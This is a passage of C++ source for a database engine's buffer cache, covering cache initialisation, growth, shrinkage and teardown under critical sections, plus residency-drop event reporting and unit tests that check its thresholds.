BOOL g_fBFCacheInitialized = fFalse;
//
// g_critCacheSizeSetTarget controls both the setting and the consumption of the cache target (set point).
// Outside of term / BF tear down, there is only one way to set the cache size target: via
// SetOptimalResourcePoolSize() (wrapped by BFICacheSetTarget()).  g_critCacheSizeSetTarget also protects writing to these globals:
//
// o cbfCacheTarget: target cache size. This is sensitive to cbfCacheDeadlock.
// o g_cbfCacheTargetOptimal: optimal target cache size. This is the optimal size as calculated by SetOptimalResourcePoolSize(),
// but before applying the cbfCacheDeadlock override.
// o g_cbfCacheUserOverride: cache size override, controlled by JET_paramCacheSize.
// o cbfAvailPoolLow: the low threshold to maintain the available pool at.
// o cbfAvailPoolHigh: the high threshold to maintain the available pool at.
// o cbfAvailPoolTarget: the optimal available pool target.
//
//
// g_critCacheSizeResize guarantees exclusive access to variables that set cache thresholds and therefore get changed
// during an actual resize operation (cache shrinkage or growth):
//
// o cbfInit: the maximum number of buffers ever allocated. The buffer descriptors (i.e., BFs) are all valid in this
// range, but the actual buffers may or may not be reserved or committed.
// o cbfCacheAddressable: the number of buffers which are guaranteed to be reserved, but may or may not be committed.
// o cbfCacheSize: the number of buffers which are currently in an unquiesced state, i.e., reserved and committed.
//
//
// In addition to the cache variables above, g_critCacheSizeResize also guarantees exclusive access to g_bfquiesced, which
// is a list of quiesced buffers which can be unquiesced at any point to fulfill a cache growth request. As a side effect,
// g_critCacheSizeResize also covers getting any buffers in and out of a quiesced state.
//
//
// Summary of expected BF states according to their stage in the buffer lifecycle:
//
// o ibf >= 0 && ibf < cbfCacheAddressable - Buffers may be used (!fAvailable && !fQuiesced), available (fAvailable && !fQuiesced)
// or quiesced (!fAvailable && fQuiesced).
// Used buffers are NEITHER in g_bfavail NOR in g_bfquiesced.
// Available buffers ARE in g_bfavail but NOT in g_bfquiesced.
// Quiesced buffers ARE in g_bfquiesced but NOT in g_bfavail, and are reserved
// but not committed.
//
// o ibf >= cbfCacheAddressable && ibf < cbfInit - Buffers are always quiesced (!fAvailable && fQuiesced), but are NOT in g_bfquiesced,
// and are reserved but not committed.
//
// o ibf >= cbfInit - Buffers have never been committed.
//
//
// WARNING: g_critCacheSizeResize is used as a best-effort-to-acquire critical section and no code should ever wait or loop forever
// trying to acquire it. That is because it needs to be acquired in paths that would violate ranking (specifically, it has the same
// rank as the BF latch), which means we'll potentially deadlock if we do an infinite wait on it.
//
//
// If you want to explicitly control the cache size (such as how cbfCacheDeadlock does), you should update the applicable parameters
// consumed by SetOptimalResourcePoolSize() and then call BFICacheSetTarget(), which will then set the cache size target. If you do
// nothing else, the cache size target will take effect at the next run of the stats task, though cache shrink will dynamically
// take this into account and stop trying to shrink early. If you need to hurry this along you can call ErrBFIMaintCacheSizeRequest().
//
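//
// A minimal illustrative sketch of that flow (hypothetical caller; the placeholder names below
// are not real identifiers, and the OnDebug() argument simply mirrors the call made at cache
// init -- its exact semantics are assumed here):
//
//      //  1. update whichever input SetOptimalResourcePoolSize() consumes
//      //     (e.g. a deadlock override or the user override)
//      cbfSomeOverride = cbfNewValue;
//      //  2. recompute and publish the new cache size target
//      BFICacheSetTarget( OnDebug( cbfExpectedTarget ) );
//      //  3. optionally hurry the resize along instead of waiting for the next stats task run
//      (void)ErrBFIMaintCacheSizeRequest();
//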
CCriticalSection g_critCacheSizeSetTarget( CLockBasicInfo( CSyncBasicInfo( "g_critCacheSizeSetTarget" ), rankBFCacheSizeSet, 0 ) );
CCriticalSection g_critCacheSizeResize( CLockBasicInfo( CSyncBasicInfo( "g_critCacheSizeResize" ), rankBFCacheSizeResize, CLockDeadlockDetectionInfo::subrankNoDeadlock ) );
volatile LONG_PTR cbfCacheTarget; // Cache set point (target).
volatile LONG_PTR g_cbfCacheTargetOptimal; // Optimal cache set point (target).
LONG_PTR g_cbfCacheUserOverride; // User override for cache set point.
LONG g_cbfCacheResident;
LONG g_cbfCacheClean;
LONG g_rgcbfCachePages[icbPageMax] = { 0 };
ULONG_PTR g_cbCacheReservedSize; // accurate reserved memory
ULONG_PTR g_cbCacheCommittedSize; // accurate committed memory
volatile LONG_PTR cbfCacheAddressable; // total all up, for all buffer sizes
volatile LONG_PTR cbfCacheSize; // total, not including quiesced buffers (i.e., dehydrated to zero)
const LONG g_rgcbPageSize[icbPageMax] =
{
/* icbPageInvalid */ 0,
/* icbPage0 */ 0, // quiesced-decommitted pages
/* icbPage64 */ 64, // micro/u-pages
/* icbPage128 */ 128,
/* icbPage256 */ 256,
/* icbPage512 */ 512,
/* icbPage1KB */ 1024,
/* icbPage2KB */ 2*1024,
/* icbPage4KB */ 4*1024, // small pages
/* icbPage8KB */ 8*1024,
/* icbPage12KB */ 12*1024,
/* icbPage16KB */ 16*1024,
/* icbPage20KB */ 20*1024,
/* icbPage24KB */ 24*1024,
/* icbPage28KB */ 28*1024,
/* icbPage32KB */ 32*1024,
};
// stats
DWORD g_cbfCommitted;
DWORD g_cbfNewlyCommitted;
DWORD g_cbfNewlyEvictedUsed;
DWORD g_cbNewlyEvictedUsed;
DWORD g_cpgReclaim;
DWORD g_cResidenceCalc;
CMovingAverage< LONG_PTR, cMaintCacheSamplesAvg > g_avgCbfCredit( 0 );
BFCacheStatsChanges g_statsBFCacheResidency;
// data (page) storage
LONG_PTR g_cpgChunk;
void** g_rgpvChunk;
ICBPage g_icbCacheMax;                  // Caution when using this variable; prefer the appropriate BF::icbPage/icbBuffer instead
// status (BF) storage
LONG_PTR cbfInit;
LONG_PTR g_cbfChunk;
BF** g_rgpbfChunk;
// initializes the cache, or returns JET_errOutOfMemory
ERR ErrBFICacheInit( __in const LONG cbPageSizeMax )
{
ERR err = JET_errSuccess;
// reset
Assert( g_critCacheSizeResize.FNotOwner() );
BFICacheIResetTarget();
g_cbfCacheUserOverride = 0;
cbfCacheAddressable = 0;
cbfCacheSize = 0;
g_cbfCacheResident = 0;
g_cbfCacheClean = 0;
memset( g_rgcbfCachePages, 0, sizeof( g_rgcbfCachePages ) );
g_cbCacheReservedSize = 0;
g_cbCacheCommittedSize = 0;
g_cbfCommitted = 0;
g_cbfNewlyCommitted = 0;
g_cbfNewlyEvictedUsed = 0;
g_cbNewlyEvictedUsed = 0;
g_cpgReclaim = 0;
g_cResidenceCalc = 0;
PERFOpt( g_tickBFUniqueReqLast = TickOSTimeCurrent() );
memset( &g_statsBFCacheResidency, 0, sizeof(g_statsBFCacheResidency) );
g_cacheram.Reset();
g_cacheram.ResetStatistics();
g_avgCbfCredit.Reset( 0 );
g_cpgChunk = 0;
g_rgpvChunk = NULL;
cbfInit = 0;
g_cbfChunk = 0;
g_rgpbfChunk = NULL;
Assert( g_rgcbPageSize[icbPage128] == 128 );
Assert( g_rgcbPageSize[icbPage1KB] == 1024 );
Assert( g_rgcbPageSize[icbPage12KB] == 12*1024 );
Assert( g_rgcbPageSize[icbPage32KB] == 32*1024 );
g_icbCacheMax = IcbBFIBufferSize( cbPageSizeMax );
if ( icbPageInvalid == g_icbCacheMax ||
icbPageInvalid == IcbBFIPageSize( cbPageSizeMax ) )
{
Error( ErrERRCheck( JET_errInvalidSettings ) );
}
// set our max usable cache size based on the following variables:
// - total virtual address space available to our process
// - total physical RAM available to our process
// - how much over the total physical RAM we are willing to reserve
// - the minimum configured cache size
const QWORD cbCacheReserveMost = min( size_t( (double)OSMemoryPageReserveTotal() * fracVAMax ),
max( pctOverReserve * OSMemoryTotal() / 100,
UlParam( JET_paramCacheSizeMin ) * g_rgcbPageSize[g_icbCacheMax] ) );
const LONG_PTR cpgChunkMin = (LONG_PTR)( cbCacheReserveMost / cCacheChunkMax / g_rgcbPageSize[g_icbCacheMax] );
for ( g_cpgChunk = 1; g_cpgChunk < cpgChunkMin; g_cpgChunk <<= 1 );
Assert( FPowerOf2( g_cpgChunk ) );
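// Illustration (not part of the build): the loop above rounds the minimum chunk size up to the
// next power of two. A hypothetical standalone equivalent:
//
//   LONG_PTR CpgRoundUpToPowerOf2( const LONG_PTR cpgMin )
//   {
//       LONG_PTR cpg = 1;
//       while ( cpg < cpgMin )
//       {
//           cpg <<= 1;   // same shift as the loop above
//       }
//       return cpg;      // e.g. cpgMin == 100 -> 128 pages per chunk
//   }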
// allocate worst case storage for the data chunk table
Alloc( g_rgpvChunk = new void*[ cCacheChunkMax ] );
memset( g_rgpvChunk, 0, sizeof( void* ) * cCacheChunkMax );
// make our status chunks the same size as our data chunks
g_cbfChunk = g_cpgChunk * g_rgcbPageSize[g_icbCacheMax] / sizeof( BF );
// allocate worst case storage for the status chunk table
Alloc( g_rgpbfChunk = new PBF[ cCacheChunkMax ] );
memset( g_rgpbfChunk, 0, sizeof( PBF ) * cCacheChunkMax );
// set the initial cache size to the minimum cache size
OnDebug( const LONG_PTR cbfInitialCacheSize = max( cbfCacheMinMin, min( UlParam( JET_paramCacheSizeMin ), UlParam( JET_paramCacheSizeMax ) ) ) );
BFICacheSetTarget( OnDebug( cbfInitialCacheSize ) );
// resize the cache to the set size
// Disables the RFS for these 8 LIDs: 33032, 49416, 48904, 65288, 40712, 57096, 44808, 61192, to
// avoid a fault on initialization ... these LIDs are meant to allow us to fail allocations during
// cache resizing operations to prove that we always recover from this.
RFSSuppressFaultInjection( 33032 );
RFSSuppressFaultInjection( 49416 );
RFSSuppressFaultInjection( 48904 );
RFSSuppressFaultInjection( 65288 );
RFSSuppressFaultInjection( 40712 );
RFSSuppressFaultInjection( 57096 );
RFSSuppressFaultInjection( 44808 );
RFSSuppressFaultInjection( 61192 );
Call( ErrBFICacheGrow() );
RFSUnsuppressFaultInjection( 33032 );
RFSUnsuppressFaultInjection( 49416 );
RFSUnsuppressFaultInjection( 48904 );
RFSUnsuppressFaultInjection( 65288 );
RFSUnsuppressFaultInjection( 40712 );
RFSUnsuppressFaultInjection( 57096 );
RFSUnsuppressFaultInjection( 44808 );
RFSUnsuppressFaultInjection( 61192 );
return JET_errSuccess;
HandleError:
BFICacheTerm();
return err;
}
// terminates the cache
void BFICacheTerm()
{
// all cached pages should be gone
C_ASSERT( icbPageMax == _countof(g_rgcbfCachePages) );
#ifndef RTM
for ( LONG icb = 0; icb < _countof(g_rgcbfCachePages); icb++ )
{
AssertRTL( g_rgcbfCachePages[icb] == 0 );
}
#endif // !RTM
// all BFs should be quiesced or available at this point (i.e. no attached DBs)
#ifdef DEBUG
for( LONG_PTR ibf = 0; ibf < cbfInit; ibf++ )
{
const BF * pbf = PbfBFICacheIbf( ibf );
Assert( pbf->fQuiesced || pbf->fAvailable );
}
#endif // DEBUG
// force the cache size to zero
Assert( !g_fBFCacheInitialized ); // the cache must already be marked uninitialized, so we know the target can safely go to zero
BFICacheIResetTarget();
// deallocate the cache
Assert( g_critCacheSizeResize.FNotOwner() );
g_critCacheSizeResize.Enter();
BFICacheIFree();
g_critCacheSizeResize.Leave();
g_cacheram.Reset();
#ifndef RTM
// check all buffer size counts are zero
AssertRTL( g_cbCacheReservedSize == 0 );
AssertRTL( g_cbCacheCommittedSize == 0 );
for( INT icbPage = icbPageSmallest; icbPage < icbPageMax; icbPage++ )
{
AssertRTL( g_rgcbfCachePages[icbPage] == 0 );
}
AssertRTL( g_cbfCommitted == 0 );
AssertRTL( g_cbfNewlyCommitted == 0 );
AssertRTL( g_cbfCacheResident == 0 );
AssertRTL( cbfCacheAddressable == 0 );
AssertRTL( cbfCacheSize == 0 );
AssertRTL( g_bfquiesced.FEmpty() );
#endif // !RTM
// free our status chunk table
if ( g_rgpbfChunk )
{
delete [] g_rgpbfChunk;
g_rgpbfChunk = NULL;
}
// free our data chunk table
if ( g_rgpvChunk )
{
delete [] g_rgpvChunk;
g_rgpvChunk = NULL;
}
}
INLINE INT CbBFISize( ICBPage icb )
{
return g_rgcbPageSize[icb];
}
// sets the new cache size target.
#ifndef RTM
TICK g_tickCacheSetTargetLast = 0;
#endif // !RTM
void BFICacheISetTarget( const LONG_PTR cbfCacheNew )
{
Assert( g_critCacheSizeSetTarget.FOwner() );
Assert( cbfCacheNew > 0 );
OnNonRTM( g_tickCacheSetTargetLast = TickOSTimeCurrent() );
const __int64 cbfCacheTargetInitial = (__int64)cbfCacheTarget;
cbfCacheTarget = cbfCacheNew;
ETCacheLimitResize( cbfCacheTargetInitial, (__int64)cbfCacheTarget );
}
// sets the cache size target to zero during pre-cache init and during cache term
void BFICacheIResetTarget()
{
g_critCacheSizeSetTarget.Enter();
OnNonRTM( g_tickCacheSetTargetLast = TickOSTimeCurrent() );
cbfCacheTarget = 0;
g_cbfCacheTargetOptimal = 0;
g_critCacheSizeSetTarget.Leave();
}
// sets the new cache size target.
void BFICacheSetTarget( OnDebug( const LONG_PTR cbfCacheOverrideCheck ) )
{
g_critCacheSizeSetTarget.Enter();
// -1 means "do not check".
Assert( cbfCacheOverrideCheck == -1 || cbfCacheOverrideCheck > 0 );
// run resource pool size calculation to determine next cache size
// note: this calls BFICacheISetTarget() / sets cbfCacheTarget
g_cacheram.SetOptimalResourcePoolSize();
// the above SetOptimalResourcePoolSize() should have taken into account any cbfCacheOverrideCheck parameter
Assert( ( cbfCacheOverrideCheck == -1 ) || ( cbfCacheTarget >= cbfCacheOverrideCheck ) || BoolParam( JET_paramEnableViewCache ) );
Assert( cbfCacheTarget >= cbfCacheMinMin );
g_critCacheSizeSetTarget.Leave();
}
// grows the cache to the cbfCacheTarget size
#ifndef RTM
TICK g_tickCacheGrowLast = 0;
#endif // !RTM
ERR ErrBFICacheGrow()
{
if ( !g_critCacheSizeResize.FTryEnter() )
{
return ErrERRCheck( JET_errTaskDropped );
}
ERR err = JET_errSuccess;
const LONG_PTR cbfCacheAddressableInitial = cbfCacheAddressable;
const LONG_PTR cbfCacheSizeInitial = cbfCacheSize;
OnNonRTM( g_tickCacheGrowLast = TickOSTimeCurrent() );
// First, we'll try and grow the pool of unquiesced buffers (i.e., the effective cache size) to
// the optimal value. If it fails with OOM we'll at least make sure we have enough to get out
// of a deadlock situation.
BOOL fGrowToAvoidDeadlock = fFalse;
LONG_PTR cbfCacheTargetNew = cbfCacheTarget;
do
{
// Some consistency checks.
if ( g_fBFCacheInitialized )
{
Assert( cbfCacheTargetNew >= cbfCacheMinMin ); // for avail pool limits
Enforce( cbfCacheTargetNew > 0 );
}
else
{
// We are initializing for the first time.
Assert( cbfCacheAddressable == 0 );
Assert( cbfCacheSize == 0 );
}
// Nothing to do, exit fast.
if ( cbfCacheSize >= cbfCacheTargetNew )
{
break;
}
// First, try to unquiesce from the quiesced pool. Remove from the tail (next-most).
PBF pbf = NULL;
while ( ( cbfCacheSize < cbfCacheTargetNew ) && ( ( pbf = g_bfquiesced.NextMost() ) != NULL ) )
{
Assert( pbf->fQuiesced );
pbf->sxwl.ClaimOwnership( bfltWrite );
BFIFreePage( pbf, fFalse );
}
// Bail if unquiescing buffers allowed the buffer cache to reach the desired point.
const LONG_PTR dcbfCacheSize = cbfCacheTargetNew - cbfCacheSize;
if ( dcbfCacheSize <= 0 )
{
break;
}
const LONG_PTR cbfCacheAddressableNew = cbfCacheAddressable + dcbfCacheSize;
Assert( !g_fBFCacheInitialized || ( cbfCacheAddressableNew <= LONG_PTR( (ULONG_PTR)cCacheChunkMax * (ULONG_PTR)min( g_cbfChunk, g_cpgChunk ) ) ) );
// allocate space for the new cache set point
const ERR errT = ErrBFICacheISetSize( cbfCacheAddressableNew );
Assert( ( cbfCacheAddressable == cbfCacheAddressableNew ) || ( errT < JET_errSuccess ) );
if ( !fGrowToAvoidDeadlock )
{
if ( errT == JET_errOutOfMemory )
{
const LONG_PTR cbfCacheDeadlockT = (LONG_PTR)AtomicReadPointer( (void**)&cbfCacheDeadlock );
// Retrying only makes sense if cbfCacheDeadlock will grow the cache and is less than
// what we've just tried.
if ( ( cbfCacheDeadlockT > cbfCacheSize ) && ( cbfCacheDeadlockT < cbfCacheTargetNew ) )
{
fGrowToAvoidDeadlock = fTrue;
cbfCacheTargetNew = cbfCacheDeadlockT;
}
}
// cache original error to return in case of a retry.
err = errT;
}
else
{
// already retried, bail.
fGrowToAvoidDeadlock = fFalse;
}
} while ( fGrowToAvoidDeadlock );
BFICacheINotifyCacheSizeChanges( cbfCacheAddressableInitial, cbfCacheSizeInitial, cbfCacheAddressable, cbfCacheSize );
g_critCacheSizeResize.Leave();
return err;
}
// deallocates (i.e., decommits + unreserves) as much as possible of the cache from the top of the buffer chunks
void BFICacheIShrinkAddressable()
{
Assert( g_critCacheSizeResize.FOwner() );
const LONG_PTR cbfCacheAddressableInitial = cbfCacheAddressable;
const LONG_PTR cbfCacheSizeInitial = cbfCacheSize;
// find the first unquiesced BF closest to the end of the cache
IBF ibf;
for ( ibf = cbfCacheAddressable - 1; ibf >= 0; ibf-- )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( !pbf->fQuiesced )
{
break;
}
Assert( !pbf->fAvailable );
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() ); // checking up-level dependency: page still not partly dirty.
g_bfquiesced.Remove( pbf );
}
const LONG_PTR cbfCacheAddressableNew = ibf + 1;
Assert( cbfCacheAddressableNew >= cbfCacheMinMin ); // this is only supposed to be called from the async shrink task, so we should never be setting
// the cache size to less than cbfCacheMinMin while the cache is active.
// free all cache beyond this BF
CallS( ErrBFICacheISetSize( cbfCacheAddressableNew ) );
Assert( cbfCacheAddressable == cbfCacheAddressableNew );
// notify about cache size changes
BFICacheINotifyCacheSizeChanges( cbfCacheAddressableInitial, cbfCacheSizeInitial, cbfCacheAddressable, cbfCacheSize );
}
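// For illustration: if the top of the cache looks like [ ..., in-use, quiesced, quiesced, quiesced ],
// the scan above stops at the first non-quiesced BF from the top, removes the three quiesced BFs from
// g_bfquiesced, and shrinks cbfCacheAddressable by three; a non-quiesced BF lower down blocks any
// further address-space release until it too is quiesced.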
// deallocates (i.e., decommits + unreserves) the entire cache
void BFICacheIFree()
{
Assert( g_critCacheSizeResize.FOwner() );
Assert( cbfCacheTarget == 0 );
const LONG_PTR cbfCacheAddressableInitial = cbfCacheAddressable;
const LONG_PTR cbfCacheSizeInitial = cbfCacheSize;
#ifdef DEBUG
IBF ibf;
// from the highest order buffer that was ever allocated (cbfInit) down to the current
// top (cbfCacheAddressable), everything must be quiesced
for ( ibf = cbfInit - 1; ibf >= cbfCacheAddressable; ibf-- )
{
PBF pbf = PbfBFICacheIbf( ibf );
Assert( pbf->fQuiesced );
Assert( !pbf->fAvailable );
}
// from the current top (cbfCacheAddressable) all the way down, the expected state depends
// on whether the buffer is quiesced or not
for ( ; ibf >= 0; ibf-- )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( pbf->fQuiesced )
{
Assert( !pbf->fAvailable );
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
g_bfquiesced.Remove( pbf );
}
else
{
Assert( pbf->fAvailable );
}
}
Assert( g_bfquiesced.FEmpty() );
#endif // DEBUG
// free the entire cache
CallS( ErrBFICacheISetSize( 0 ) );
Assert( cbfCacheAddressable == 0 );
cbfCacheSize = 0;
g_bfquiesced.Empty();
// notify about cache size changes, though probably not relevant right now, as we're terminating the cache.
BFICacheINotifyCacheSizeChanges( cbfCacheAddressableInitial, cbfCacheSizeInitial, cbfCacheAddressable, cbfCacheSize );
}
// notifies about cache size changes, which updates globals and may kick-off tasks for cache size maintenance
void BFICacheINotifyCacheSizeChanges(
const LONG_PTR cbfCacheAddressableInitial,
const LONG_PTR cbfCacheSizeInitial,
const LONG_PTR cbfCacheAddressableFinal,
const LONG_PTR cbfCacheSizeFinal )
{
Assert( g_critCacheSizeResize.FOwner() );
if ( cbfCacheAddressableFinal != cbfCacheAddressableInitial )
{
// set the page hint cache size to an appropriate size given the new
// cache size
CallS( CPAGE::ErrSetPageHintCacheSize( cbfCacheAddressableFinal * sizeof( DWORD_PTR ) ) );
}
if ( ( cbfCacheSizeFinal != cbfCacheSizeInitial ) && ( cbfCacheSizeFinal != 0 ) )
{
(void)ErrBFIMaintCacheStatsRequest( bfmcsrtForce );
}
ETCacheResize( (__int64)cbfCacheAddressableInitial,
(__int64)cbfCacheSizeInitial,
(__int64)cbfCacheAddressableFinal,
(__int64)cbfCacheSizeFinal );
}
void BFIReportCacheStatisticsChanges(
__inout BFCacheStatsChanges* const pstatsBFCacheResidency,
__in const __int64 ftNow,
__in const INT cbfCacheResidentCurrent,
__in const INT cbfCacheCurrent,
// Additional parameters do not affect the logic, so they default to zero to avoid having to
// update a large number of unit tests.
__in const __int64 cbCommittedCacheSize = 0,
__in const __int64 cbCommitCacheTarget = 0,
__in const __int64 cbTotalPhysicalMemory = 0 );
void BFIReportCacheStatisticsChanges(
__inout BFCacheStatsChanges* const pstatsBFCacheResidency,
__in const __int64 ftNow,
__in const INT cbfCacheResidentCurrent,
__in const INT cbfCacheCurrent,
__in const __int64 cbCommittedCacheSize,
__in const __int64 cbCommitCacheTarget,
__in const __int64 cbTotalPhysicalMemory )
{
Assert ( cbfCacheCurrent >= 0 );
// Cache too small. Bypass computation.
if ( cbfCacheCurrent < 3840 )
{
return;
}
// Bootstrapping. Assume the cache was fully resident.
if ( pstatsBFCacheResidency->ftResidentLastEvent == 0 )
{
pstatsBFCacheResidency->ftResidentLastEvent = ftNow;
pstatsBFCacheResidency->cbfResidentLast = cbfCacheCurrent;
pstatsBFCacheResidency->cbfCacheLast = cbfCacheCurrent;
}
pstatsBFCacheResidency->eResidentCurrentEventType = eResidentCacheStatusNoChange;
pstatsBFCacheResidency->csecLastEventDelta = -1;
eResidentCacheStatusChange eStatus = eResidentCacheStatusNoChange;
const INT pctCacheResidentLowThreshold = 80;
const INT pctCacheResidentDropThreshold = 30;
const INT pctCacheResident = (INT)( ( (__int64)cbfCacheResidentCurrent * 100 ) / cbfCacheCurrent );
const INT pctCacheResidentLast = (INT)( ( (__int64)pstatsBFCacheResidency->cbfResidentLast * 100 ) / pstatsBFCacheResidency->cbfCacheLast );
const INT pctCacheResidentDelta = pctCacheResident - pctCacheResidentLast;
// Issue red event if:
// o Current residency percentage is below threshold and...
// o Last residency percentage was above threshold or residency percentage decreased by more than delta threshold.
//
// Issue green event if:
// o Last residency percentage was below threshold and current residency percentage is above threshold.
if ( ( pctCacheResident < pctCacheResidentLowThreshold ) &&
( ( pctCacheResidentLast >= pctCacheResidentLowThreshold ) || ( -pctCacheResidentDelta > pctCacheResidentDropThreshold ) ) )
{
eStatus = eResidentCacheStatusDrop;
}
else
{
const INT pctCacheResidentNormalThreshold = 85;
C_ASSERT ( pctCacheResidentNormalThreshold > pctCacheResidentLowThreshold );
if ( ( pctCacheResidentLast < pctCacheResidentNormalThreshold ) && ( pctCacheResident >= pctCacheResidentNormalThreshold ) )
{
eStatus = eResidentCacheStatusRestore;
}
}
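// Worked example (mirrors the unit tests further below): with a 100,000-buffer cache, if the last
// recorded residency was 100% and the current pass measures 79%, we are below the 80% low threshold
// while the last value was above it, so a red (drop) event fires. If the last recorded residency was
// already 79% (below threshold), a further slide to 49% is exactly a 30-point delta and does NOT
// fire, while 48% (a 31-point delta) does. A green (restore) event fires only when we cross from
// below 85% back up to 85% or higher.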
pstatsBFCacheResidency->eResidentCurrentEventType = eStatus;
if ( eStatus != eResidentCacheStatusNoChange )
{
// Last residency.
WCHAR wszPercentResidentLast[16];
WCHAR wszResidentBuffersLast[16];
WCHAR wszTotalBuffersLast[16];
OSStrCbFormatW( wszPercentResidentLast, sizeof(wszPercentResidentLast), L"%d", pctCacheResidentLast );
OSStrCbFormatW( wszResidentBuffersLast, sizeof(wszResidentBuffersLast), L"%d", pstatsBFCacheResidency->cbfResidentLast );
OSStrCbFormatW( wszTotalBuffersLast, sizeof(wszTotalBuffersLast), L"%d", pstatsBFCacheResidency->cbfCacheLast );
// Elapsed time.
WCHAR wszSecsDelta[24];
pstatsBFCacheResidency->csecLastEventDelta = UtilConvertFileTimeToSeconds( ftNow - pstatsBFCacheResidency->ftResidentLastEvent );
OSStrCbFormatW( wszSecsDelta, sizeof(wszSecsDelta), L"%I64d", pstatsBFCacheResidency->csecLastEventDelta );
// Current residency.
WCHAR wszPercentResident[16];
WCHAR wszResidentBuffers[16];
WCHAR wszTotalBuffers[16];
OSStrCbFormatW( wszPercentResident, sizeof(wszPercentResident), L"%d", pctCacheResident );
OSStrCbFormatW( wszResidentBuffers, sizeof(wszResidentBuffers), L"%d", cbfCacheResidentCurrent );
OSStrCbFormatW( wszTotalBuffers, sizeof(wszTotalBuffers), L"%d", cbfCacheCurrent );
// Current cache size vs. target.
WCHAR wszCachePctOfTarget[70]; wszCachePctOfTarget[0] = L'\0';
WCHAR wszCacheSizeVsTarget[70]; wszCacheSizeVsTarget[0] = L'\0';
WCHAR wszRamSize[70]; wszRamSize[0] = L'\0';
if ( cbCommitCacheTarget && cbTotalPhysicalMemory )
{
const INT pctCacheTarget = (INT)( ( (__int64)cbCommittedCacheSize * 100 ) / cbCommitCacheTarget );
OSStrCbFormatW( wszCachePctOfTarget, sizeof(wszCachePctOfTarget), L"%d", pctCacheTarget );
OSStrCbFormatW( wszCacheSizeVsTarget, sizeof(wszCacheSizeVsTarget),
L"%0.03f / %0.03f",
DblMBs( cbCommittedCacheSize ),
DblMBs( cbCommitCacheTarget ) );
OSStrCbFormatW( wszRamSize, sizeof(wszRamSize),
L"%0.03f",
DblMBs( cbTotalPhysicalMemory ) );
}
// Log event
const WCHAR* rgwsz [] =
{
wszPercentResidentLast,
wszResidentBuffersLast,
wszTotalBuffersLast,
wszSecsDelta,
wszPercentResident,
wszResidentBuffers,
wszTotalBuffers,
wszCachePctOfTarget,
wszCacheSizeVsTarget,
wszRamSize
};
switch ( eStatus )
{
case eResidentCacheStatusDrop:
UtilReportEvent(
eventWarning,
PERFORMANCE_CATEGORY,
RESIDENT_CACHE_HAS_FALLEN_TOO_FAR_ID,
_countof( rgwsz ), rgwsz );
break;
case eResidentCacheStatusRestore:
// Question: for the memory diagnostics workflow, what event ID shall we use?
// Probably a similar message, e.g. "Resident cache has risen by xx buffers ...".
UtilReportEvent(
eventInformation,
PERFORMANCE_CATEGORY,
RESIDENT_CACHE_IS_RESTORED_ID,
_countof( rgwsz ), rgwsz );
break;
}
// Store the last cache values.
pstatsBFCacheResidency->ftResidentLastEvent = ftNow;
pstatsBFCacheResidency->eResidentLastEventType = eStatus;
pstatsBFCacheResidency->cbfResidentLast = cbfCacheResidentCurrent;
pstatsBFCacheResidency->cbfCacheLast = cbfCacheCurrent;
}
}
// Unit tests for residency too low reporting
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsSimple )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 20, 20 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Validate a 20% drop does not trigger the event if the cache isn't at least 3840 buffers ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 16, 20 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reset things / grow the cache ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Validate a 6% drop does not trigger the event, even though the cache is more than 3840 buffers ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 94000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Validate even a 10% drop does not trigger if we're not at least 20% down ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 88000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Validate we need to fall below the 80% residency threshold (more than a 20% total drop from cache size) to trigger the event ...
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Move the resident size up a tiny bit
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 83000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// And move it up another tiny bit, should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep creeping it down, should not event until at least 30% lost (< 49000)
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 83000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 70000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 49000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 48999, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
// Unit tests for residency cache green event
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportGreenStats )
{
